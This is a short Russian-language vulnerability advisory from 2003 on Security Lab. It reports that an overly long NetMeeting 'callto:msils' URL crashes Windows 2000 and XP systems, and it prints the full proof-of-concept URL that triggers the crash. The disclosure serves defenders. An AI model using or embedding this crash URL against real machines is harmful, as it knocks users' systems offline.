Security Lab

Чрезмерно длинный NetMeeting URL запрос приводит к аварийному завершению работы Windows систем

Дата публикации:23.05.2003
Всего просмотров:1012
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в операционных системах Microsoft Windows 2000 и XP в обработке NetMeeting URL. Удаленный пользователь может сконструировать URL, который, при загрузке, аварийно завершит работу операционной системы.

Сообщается, что злонамеренный NetMeeting CallTo URL (callto:msils) может вызвать 'Kmode' исключение. Пример:

callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAaAAAAAAAAAA+type=directory
Уязвимость подтверждена на Windows 2000 SP3 и Windows XP Pro системах
Ссылки: Blue screen in Windows